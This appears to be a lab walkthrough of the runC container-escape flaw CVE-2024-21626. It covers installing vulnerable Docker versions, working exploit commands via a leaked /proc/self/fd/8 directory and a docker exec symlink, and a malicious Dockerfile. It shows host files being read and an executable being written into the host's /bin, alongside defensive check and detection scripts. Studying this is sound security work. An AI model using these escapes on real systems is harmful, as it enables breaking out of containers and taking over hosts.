Read my full article for a detailed explanation here.
While investigating CVE-2024-21626, I discovered an overlooked vulnerability in older versions of Docker and runC. To learn more about what I found, read the following article: "Exploring Hidden Vulnerabilities in Legacy Docker Versions: Lessons from CVE-2024-21626".
- During the installation, do not check the box to download updates while installing.
- Insert the Guest Additions CD image.
- Open a terminal in the mounted CD image.
- Run the VBoxLinuxAdditions.run script:
demo@demo-pc:/media/demo/VBox_GAs_7.0.14$ sudo ./VBoxLinuxAdditions.run
Set up Docker's apt repository
# set up Docker's apt repository: add Docker's official GPG key
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# add the repository to Apt sources
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
Find and install a vulnerable version of each component (docker-ce, docker-ce-cli, containerd.io, docker-buildx-plugin); the versions below are the ones used in this lab.
# list the docker-ce versions available in the repository
apt-cache madison docker-ce | awk '{ print $3 }'
# select the chosen version
VERSION_STRING=5:24.0.6-1~ubuntu.22.04~jammy
# list the containerd.io and docker-buildx-plugin versions available in the repository
apt-cache madison containerd.io | awk '{ print $3 }'
apt-cache madison docker-buildx-plugin | awk '{ print $3 }'
# install the packages
sudo apt install docker-ce=$VERSION_STRING \
  docker-ce-cli=$VERSION_STRING \
  containerd.io=1.6.4-1 \
  docker-buildx-plugin=0.10.2-1~ubuntu.22.04~jammy
If the packages are too old to be found in the repository (see also the old repository online), or if you cannot use Docker's apt repository to install Docker Engine, download the deb files for your release and install them manually. Get them from https://download.docker.com/linux/ubuntu/dists/ or use the deb files inside my GitHub repository:
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# install deb files
cd CVE-2024-21626/deb
sudo dpkg -i ./containerd.io_1.6.4-1_amd64.deb \
./docker-ce_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-ce-cli_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-buildx-plugin_0.10.2-1~ubuntu.22.04~jammy_amd64.deb
Verify the installed versions and the kernel release:
sudo docker version
runc --version
containerd --version
uname -r
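A quick first triage of the runc version, as an added example that is not part of the repository: it parses the output of `runc --version` and compares it against 1.1.12, the upstream release that fixes CVE-2024-21626. The only assumption is upstream version numbering; distribution packages can carry the fix as a backport under an older version string, so a "predates the fix" verdict means "run checkVulnerability.sh", not proof.

```shell
#!/bin/sh
# Added example (not from the repository): decide from `runc --version`
# output whether the runc build predates the CVE-2024-21626 fix.
# Assumption: upstream runc fixed the bug in 1.1.12, so any upstream
# version below that is treated as vulnerable. Distro builds may backport
# the patch without changing the version string, so confirm with the
# checkVulnerability.sh run described later in this page.

# extract "X.Y.Z" from the first line of `runc --version` output
# (e.g. "runc version 1.1.1"), dropping any "-rc1" style suffix
runc_version_string() {
    printf '%s\n' "$1" \
        | sed -n 's/^runc version \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p' \
        | head -n 1
}

# compare two dotted versions component by component; prints -1, 0 or 1
version_cmp() {
    i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s\n' "$1" | cut -d. -f"$i")
        y=$(printf '%s\n' "$2" | cut -d. -f"$i")
        x=${x:-0}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then echo -1; return; fi
        if [ "$x" -gt "$y" ]; then echo 1; return; fi
        i=$((i + 1))
    done
    echo 0
}

# return 0 (true) when the version in the given `runc --version` output
# is below 1.1.12; return 2 when the output cannot be parsed
runc_is_vulnerable() {
    v=$(runc_version_string "$1")
    [ -n "$v" ] || { echo "could not parse runc version" >&2; return 2; }
    [ "$(version_cmp "$v" 1.1.12)" -lt 0 ]
}

# live check against the runc binary in PATH
check_installed_runc() {
    out=$(runc --version 2>/dev/null) || { echo "runc not found in PATH"; return 2; }
    if runc_is_vulnerable "$out"; then
        echo "runc $(runc_version_string "$out"): version predates the 1.1.12 fix"
    else
        echo "runc $(runc_version_string "$out"): version includes the 1.1.12 fix"
    fi
}

# only run the live check where runc is actually installed
if command -v runc >/dev/null 2>&1; then
    check_installed_runc
fi
```

Run it on the lab VM after the installation above; with the runc shipped by containerd.io 1.6.4 it reports the version as predating the fix.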
The exploit depends on the openat2 syscall being available on the host kernel (openat2 was added in Linux 5.6). Check manually with the following command; a matching symbol means the kernel exports it:
grep openat2 /proc/kallsyms
If that is not conclusive, the testOpenat2 Go program in my GitHub repository tries the syscall directly and reports whether it is present:
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# run testOpenat2
cd CVE-2024-21626/testOpenat2
./testOpenat2
The unix.Openat2 syscall is present on this system.
The binary in the repository was built with the following command:
env GOOS=linux GOARCH=amd64 go build testOpenat2.go
Run checkVulnerability.sh: if the host file is printed in the terminal, the setup is vulnerable.
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# run checkVulnerability.sh
cd CVE-2024-21626
chmod +x checkVulnerability.sh
./checkVulnerability.sh
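To see what /proc/self/fd/8 actually refers to before running the exploits, here is an added helper (not the repository's checkVulnerability.sh) that enumerates a process's file descriptors through /proc and flags the ones that are directories: CVE-2024-21626 is precisely a leaked directory fd, and every attack on this page reaches the host through it. It assumes /proc is mounted and `readlink` from coreutils is available. The demo at the end opens "/" on fd 8 in the current shell as a constructed stand-in for the leaked handle; it is not the real leak.

```shell
#!/bin/sh
# Added example (not part of the repository): list the open file
# descriptors of a process and flag those that are directories. CVE-2024-21626
# is an fd leak: runc left a directory handle to a host path open in the
# container process, and the exploits on this page address it as
# /proc/self/fd/8. Assumptions: /proc is mounted, `readlink` is available.

# print "fd -> target" for every fd of process $1 (default: current shell),
# appending " [dir]" when the fd refers to a directory
list_fds() {
    pid=${1:-$$}
    for link in /proc/"$pid"/fd/*; do
        [ -e "$link" ] || [ -L "$link" ] || continue
        n=${link##*/}
        target=$(readlink "$link") || target='?'
        if [ -d "$link" ]; then
            printf '%s -> %s [dir]\n' "$n" "$target"
        else
            printf '%s -> %s\n' "$n" "$target"
        fi
    done
}

# print only the directory fds: inside an unpatched container, a directory fd
# whose target is a host path is the leak the exploits use
dir_fds() {
    list_fds "$1" | grep ' \[dir\]$' || true
}

# return 0 if fd $2 of process $1 refers to a directory, 1 otherwise
fd_is_dir() {
    [ -d "/proc/$1/fd/$2" ]
}

# demo (constructed): open "/" on fd 8 in this shell and show the scan
# finding it, then close it again
exec 8</
dir_fds "$$"
exec 8<&-
```

From the shell of a container started on the vulnerable setup, `dir_fds $$` shows which fd numbers are directories and where they point; that is the number to pass to `-w /proc/self/fd/N` if 8 does not work in your environment.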
Exploit via setting the working directory to /proc/self/fd/ (attack 1)
# run a container whose working directory is the leaked host directory fd (8 here; the number can differ between setups, so try nearby values if 8 does not work)
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
# read host filesystem files from inside the container (the getcwd message is bash noise and can be ignored; ".." of "/" is "/", so extra ../ components are harmless)
root@c4c0a9c99be6:.# cat ../../../../../../../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
Exploit via docker exec (attack 2):
Open one terminal and execute the following commands
# terminal 1
# run container
demo@demo-pc:~$ sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
Open another terminal and run the following command
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 120
Go back to the first terminal: the exec'd sleep process has its working directory in the leaked host directory, so the host filesystem is reachable through /proc/<pid>/cwd
# terminal 1: find the pid of the exec'd sleep by its cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# read host filesystem files by walking up from the sleep process's cwd
root@d98de5a852d7:/# cat /proc/9/cwd/../../../../../../../../../etc/hostname
demo-pc
# read container filesystem files
root@d98de5a852d7:/# cat /etc/hostname
d98de5a852d7
Attack 3a: write a file into the host's /bin (attack 1 adapted)
# run container with the working directory set to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@e5b0730af51d:.#
# write a file into the host filesystem (here a new script in the host's /bin; an existing binary could be overwritten the same way)
root@b6873018a7e8:.# cat > ../../../../../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# make it executable with the host's chmod (each path only needs enough ../ to reach the host root; ".." of "/" is "/", so the counts need not match)
root@b6873018a7e8:.# ../../../../../bin/chmod +x ../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# on the host, check that the file is present
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:24 cve2024_21626
# run it on the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
Attack 3b: write a file into the host's /bin (attack 2 adapted)
# terminal 1
# run container
sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 1000
# terminal 1
# find the pid of the exec'd sleep by its cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep1000
# write a file into the host filesystem through the sleep process's cwd
root@d98de5a852d7:/# cat > /proc/9/cwd/../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# make it executable with the host's chmod
root@d98de5a852d7:/# /proc/9/cwd/../../../../bin/chmod +x \
/proc/9/cwd/../../../../bin/cve2024_21626
# on the host, check that the file is present
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:39 cve2024_21626
# run it on the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
Given the following Dockerfile, which bakes the malicious working directory into the image:
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8
Build and run the image; the shell starts inside the leaked host directory and can read host files:
sudo docker build . -t devil-image
sudo docker run -it --rm devil-image bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@415a2e1f079f:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
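Images can carry the working directory in their metadata, as the Dockerfile above does, so a path check is a cheap triage step. Here is an added detection helper (not part of the repository) that flags WORKDIR directives, or any working-directory value, pointing under /proc. It assumes no legitimate image needs a working directory under /proc; the sample Dockerfile inside the block is constructed to mirror the one above.

```shell
#!/bin/sh
# Added example (not part of the repository): flag working directories that
# point into /proc, which is how a malicious image (WORKDIR /proc/self/fd/8)
# or a `docker run -w` / `docker exec -w` invocation reaches the leaked host
# fd. Assumption: a working directory under /proc is never legitimate.

# return 0 if a working-directory value is suspicious
# (/proc itself or anything below it, e.g. /proc/self/fd/8), 1 otherwise
workdir_is_suspicious() {
    case "$1" in
        /proc|/proc/*) return 0 ;;
        *) return 1 ;;
    esac
}

# read a Dockerfile on stdin and print each offending WORKDIR as "LINENO: line";
# exit status 1 when at least one line was flagged, 0 when clean
scan_dockerfile() {
    awk '
        toupper($1) == "WORKDIR" {
            d = $2
            gsub(/"/, "", d)                      # tolerate WORKDIR "/proc/..."
            if (d == "/proc" || index(d, "/proc/") == 1) {
                print NR ": " $0
                hits++
            }
        }
        END { exit (hits > 0 ? 1 : 0) }'
}

# constructed sample mirroring the Dockerfile above, plus a benign WORKDIR
sample_dockerfile='FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8
workdir /app'

# demo: prints "3: WORKDIR /proc/self/fd/8"
printf '%s\n' "$sample_dockerfile" | scan_dockerfile || true
```

Feed a Dockerfile on stdin (`scan_dockerfile < Dockerfile`), or check a running container's configured working directory with `workdir_is_suspicious "$(docker inspect --format '{{.Config.WorkingDir}}' <container>)"`. Keep the limit in mind that this page itself demonstrates: the docker exec attack goes through a symlink (/bar -> /proc/self/fd/8), which a string check on the path never sees, so this is triage only and the real fix is upgrading runc.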